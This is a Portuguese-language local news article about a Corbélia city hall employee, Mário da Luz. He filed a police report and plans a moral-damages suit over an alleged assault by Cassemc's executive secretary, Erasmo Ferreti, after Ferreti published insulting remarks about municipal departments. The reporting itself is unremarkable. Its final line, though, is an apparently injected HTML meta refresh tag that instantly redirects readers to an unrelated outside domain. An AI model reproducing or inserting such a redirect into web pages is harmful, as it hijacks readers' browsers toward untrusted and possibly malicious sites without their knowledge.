Mário da Luz, foi à polícia e agora move ação por danos morais.
O servidor do setor de Recursos Humanos da Prefeitura de Corbélia, Mario Assis da Luz, registrou Boletim de Ocorrência na Polícia contra o Secretário Executivo da Cassemc, Erasmo Eri Ferreti. Mário da Luz alega ter sido agredido dentro do seu local de trabalho, uma sala que fica na Prefeitura. A agressão foi na tarde de quarta-feira (07).
Ele confirmou também que vai mover uma ação na Justiça onde pede reparação de danos morais por agressão, calúnia, injúria e desacato a servidor público.
O estopim da crise teria sido uma publicação no informativo mensal da Cassemc, onde o secretário executivo, Erasmo Ferreti, fez comentários sobre uma suposta inoperância do Departamento de Recursos Humanos e da Procuradoria Jurídica do Município. Na nota o secretário da Cassemc diz: “Estamos enviando um apelo ao TCE, com cópias para Executivo, MP local, e Conselho de Administração/Cassemc, para ver se melhoram as relações com o Departamento Jurídico”.
No mesmo informativo, no parágrafo seguinte Ferreti afirma: “Este secretário apresentou manifestação por escrito com relação à aposentadoria da servidora, Elvira Werner Pasetti, pelas 04 horas adicionais. Neste caso imperou a estupidez, burrice e mais algumas qualificações impublicáveis por parte dos ocupantes dos Departamentos Pessoal e Jurídico, que devem conhecer de cor e salteado os princípios do direito administrativo. A nota publicada no informativo interno conclui dizendo “É o que dá manter incompetentes no serviço público”.
O informativo correu os departamentos públicos e gerou indigestão. A agressão repercutiu na tribuna da Câmara de Vereadores. O secretário da Câmara, Marcio Auache (PMDB), usou a palavra na sessão de segunda-feira para fazer o que ele chamou de desabafo. Auache diz que a Cassemc movimenta valores altos e considerou que o secretário executivo se mostrou destemperado para a função. “Uma situação dessas gera extrema instabilidade. Um órgão que movimenta recursos altos e mexe justamente com a seguridade dos servidores precisa oferecer segurança”, argumentou o vereador.
<meta http-equiv="refresh" content="0; url=http://38zu.cn">